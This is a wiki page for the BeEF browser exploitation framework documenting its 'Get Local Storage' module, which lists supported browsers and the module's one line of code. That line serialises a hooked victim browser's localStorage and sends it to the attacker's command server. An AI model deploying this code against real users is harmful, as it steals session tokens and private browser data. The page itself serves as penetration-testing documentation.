-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Get Local Storage
Jess Williams edited this page Dec 31, 2019
·
2 revisions
- Objective: Extracts data from the HTML5 localStorage object..
- Date: ???
- Authors: bcoles
- Browsers: Internet Explorer 8+, Firefox 4+, opera 11+, Chrome 4+, Safari 4+
- Code
This module just gather the localStorage of the page by using window['localStorage'] :
beef.net.send("<%= @command_url %>", <%= @command_id %>, "localStorage="+JSON.stringify(window['localStorage']));
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK